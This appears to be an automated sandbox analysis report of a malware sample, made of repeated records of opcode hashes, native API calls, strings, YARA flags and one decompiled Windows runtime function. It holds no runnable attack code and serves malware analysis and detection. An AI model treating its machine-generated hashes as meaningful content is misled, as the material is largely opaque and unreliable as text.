                                                                          • Instruction ID: b5fedd925999d55cdd36c154a349704c6730e4f8af98a0ff374cffabcdc2c0b5
                                                                          • Opcode Fuzzy Hash: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
                                                                          • Instruction Fuzzy Hash: B490027120500403D30061695508B07000597D0341F52D435A0514598DD6968851B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                          • Instruction ID: 2820e33edad96c8073d441cf8b467349140a2c2c5665985fd971a08317af0b9f
                                                                          • Opcode Fuzzy Hash: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                          • Instruction Fuzzy Hash: 0990026120904442D30065695408F06000597D0345F52D035A11545D5DC6758851F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                          • Instruction ID: 839f87062b0c8f29c0d1ed1583676903a87c8895062ab4ada9e5a5374e6dafb7
                                                                          • Opcode Fuzzy Hash: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                          • Instruction Fuzzy Hash: C790027520904442D70065695804F87000597D0345F52D435A05145DCD86948861F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: fffe924e3715e38202a0e3d92c7aa9f816dad169290f16defe818bb41ed2bb3a
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                          				void* _t7;
                                                                          				intOrPtr _t9;
                                                                          				intOrPtr _t10;
                                                                          				intOrPtr* _t12;
                                                                          				intOrPtr* _t13;
                                                                          				intOrPtr _t14;
                                                                          				intOrPtr* _t15;
                                                                          
                                                                          				_t13 = __edx;
                                                                          				_push(_a4);
                                                                          				_t14 =  *[fs:0x18];
                                                                          				_t15 = _t12;
                                                                          				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                          				_push(_t13);
                                                                          				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                          				_t9 =  *_t15;
                                                                          				if(_t9 == 0xffffffff) {
                                                                          					_t10 = 0;
                                                                          				} else {
                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                          				}
                                                                          				_push(_t10);
                                                                          				_push(_t15);
                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                          				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                          			}
                                                                          0x00b0fdda
                                                                          0x00b0fde2
                                                                          0x00b0fde5
                                                                          0x00b0fdec
                                                                          0x00b0fdfa
                                                                          0x00b0fdff
                                                                          0x00b0fe0a
                                                                          0x00b0fe0f
                                                                          0x00b0fe17
                                                                          0x00b0fe1e
                                                                          0x00b0fe19
                                                                          0x00b0fe19
                                                                          0x00b0fe19
                                                                          0x00b0fe20
                                                                          0x00b0fe21
                                                                          0x00b0fe22
                                                                          0x00b0fe25
                                                                          0x00b0fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                          • Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
                                                                          • Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                          • Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Executed Functions

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00413B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413B97,007A002E,00000000,00000060,00000000,00000000), ref: 0041820D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtClose.NTDLL(0=A,?,?,00413D30,00000000,FFFFFFFF), ref: 00418315
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: 0=A
                                                                          • API String ID: 3535843008-2954429754
                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00413A11,?,?,?,?,00413A11,FFFFFFFF,?,R=A,?,00000000), ref: 004182B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00413A11,?,?,?,?,00413A11,FFFFFFFF,?,R=A,?,00000000), ref: 004182B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction ID: 6f26a84ed9cee7b9b307b3f66eeb50f96d6269818b5e914aefad87f60d68ad55
                                                                          • Opcode Fuzzy Hash: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction Fuzzy Hash: 0BF0B7B2200108AFCB14DF99DC80EEB77A9EF9C354F158649FA1DD7241DA30E851CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004183D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
                                                                          • Instruction ID: 59c0ab611d385d335f342a588196d362395d878abf7e5b7a9b55f5c2114bda3e
                                                                          • Opcode Fuzzy Hash: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
                                                                          • Instruction Fuzzy Hash: 9F9002A5221040032105A9590705507004A97D5797751D021F1006550CE661D8716161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
                                                                          • Instruction ID: 65da4e856814bc4a28da92f95a934343d3bafaf1592cf85a02204c830259d1a0
                                                                          • Opcode Fuzzy Hash: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
                                                                          • Instruction Fuzzy Hash: 679002E121204003610575594415616400E97E0647F51D021E1005590DD565D8A17165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
                                                                          • Instruction ID: 2a1f9e91595a2d6a67ea8bcf527c4707fd96584fd538122c2f2857fdb3a8e249
                                                                          • Opcode Fuzzy Hash: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
                                                                          • Instruction Fuzzy Hash: 7A9002B121104802F1807559440564A000997D1747F91D015A0016654DDA55DA6977E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
                                                                          • Instruction ID: 852210fb4198b4ef375d21b2748f76f2653b4e79503bccac501f32de7916b976
                                                                          • Opcode Fuzzy Hash: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
                                                                          • Instruction Fuzzy Hash: 019002B121508842F14075594405A46001997D074BF51D011A0055694DA665DD65B6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
                                                                          • Instruction ID: 37339e01bd96f14cf1ece8d5f5dcb7f31f18a19901c923379d9e16847cab6de6
                                                                          • Opcode Fuzzy Hash: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
                                                                          • Instruction Fuzzy Hash: 459002B12110C802F1106559840574A000997D0747F55D411A4415658D96D5D8A17161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
                                                                          • Instruction ID: 5cafa21be8155f903edf76c12118fb577bacaf20b493d0a713195d34b86764b7
                                                                          • Opcode Fuzzy Hash: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
                                                                          • Instruction Fuzzy Hash: 019002B121104842F10065594405B46000997E0747F51D016A0115654D9655D8617561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
                                                                          • Instruction ID: 55791d489d55beab4b59f7e097f0b378b7eed7b719c92b254d5713eb991e58af
                                                                          • Opcode Fuzzy Hash: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
                                                                          • Instruction Fuzzy Hash: 139002B121104402F10069995409646000997E0747F51E011A5015555ED6A5D8A17171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
                                                                          • Instruction ID: f0325f22ac9860d5960db4aa391410d101146be8f29e0857cff0efe65ecff1ed
                                                                          • Opcode Fuzzy Hash: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
                                                                          • Instruction Fuzzy Hash: 389002B132118402F11065598405706000997D1647F51D411A0815558D96D5D8A17162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
                                                                          • Instruction ID: cf6653ff5640415808d048635662a8643011f9cb8343b2772910c7bc23c5d150
                                                                          • Opcode Fuzzy Hash: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
                                                                          • Instruction Fuzzy Hash: FD9002A922304002F1807559540960A000997D1647F91E415A0006558CD955D8796361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
                                                                          • Instruction ID: 4c36bacefce5ac28f985447ac7c45ad112a257c28a863fe481c1cafdaf86f291
                                                                          • Opcode Fuzzy Hash: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
                                                                          • Instruction Fuzzy Hash: 709002B121104413F11165594505707000D97D0687F91D412A0415558DA696D962B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
                                                                          • Instruction ID: 4956ab1b5c8cdc4efc1869a3b7a95897f9e717bd0d404ce847cc88ad5978d1a3
                                                                          • Opcode Fuzzy Hash: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
                                                                          • Instruction Fuzzy Hash: EC9002A1252081527545B5594405507400AA7E0687B91D012A1405950C9566E866E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
                                                                          • Instruction ID: 04a8b589be77d55808fb1cb49ec31c097b400c88dbcdddae7808b6678e2d1a8c
                                                                          • Opcode Fuzzy Hash: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
                                                                          • Instruction Fuzzy Hash: F49002F121104402F14075594405746000997D0747F51D011A5055554E9699DDE576A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
                                                                          • Instruction ID: 3aafd3b176b985608d92c7cc22fb8be50ca40e4efb81cd14ddfb1250c2c762ed
                                                                          • Opcode Fuzzy Hash: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
                                                                          • Instruction Fuzzy Hash: EB9002E135104442F10065594415B060009D7E1747F51D015E1055554D9659DC627166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
                                                                          • Instruction ID: 1b48262c0c24d3898e90e1ace0224c53f261669c176e49cb31037f9367fba854
                                                                          • Opcode Fuzzy Hash: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
                                                                          • Instruction Fuzzy Hash: FF9002A122184042F20069694C15B07000997D0747F51D115A0145554CD955D8716561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00416F88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: a12a8d8845f52a6374b7654c5684f76eba2860a5417c6425b9b4e870ec8aa73a
                                                                          • Instruction ID: f390af8b8c11f781ec7d9a350aaf589afc469f5b83d9769a5f77b792f8f092a7
                                                                          • Opcode Fuzzy Hash: a12a8d8845f52a6374b7654c5684f76eba2860a5417c6425b9b4e870ec8aa73a
                                                                          • Instruction Fuzzy Hash: 2931AFB1601304ABC711DF65D8A1FA7B7B8AB48704F00841EF61AAB241D774F986CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00416F88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: ab85c865195801190fb0fa97fa2da08348f03e331522e7d1c6e79531713775f8
                                                                          • Instruction ID: 555fb8e4d673b83352529fa7b85178f543cd7881808703a3302e5c0e0879d347
                                                                          • Opcode Fuzzy Hash: ab85c865195801190fb0fa97fa2da08348f03e331522e7d1c6e79531713775f8
                                                                          • Instruction Fuzzy Hash: 3E31BFB1601300BBC710DF65D8A1FABB7B8AB48704F14806EF6196B241D774E996CBE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .z`
                                                                          • API String ID: 0-1441809116
                                                                          • Opcode ID: 6842731990029c057971e6ca307babc9a96aa20a556c4078d30577f747065fcd
                                                                          • Instruction ID: 81d09adf5c81ef1f741ab8b7a9607e6be393085894e564b464267bffea62a691
                                                                          • Opcode Fuzzy Hash: 6842731990029c057971e6ca307babc9a96aa20a556c4078d30577f747065fcd
                                                                          • Instruction Fuzzy Hash: 25F027B9504300BFDB21CF249C81ED33B5AAF55308F12425FF85947742DA34D952CAB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 004184FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                          • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
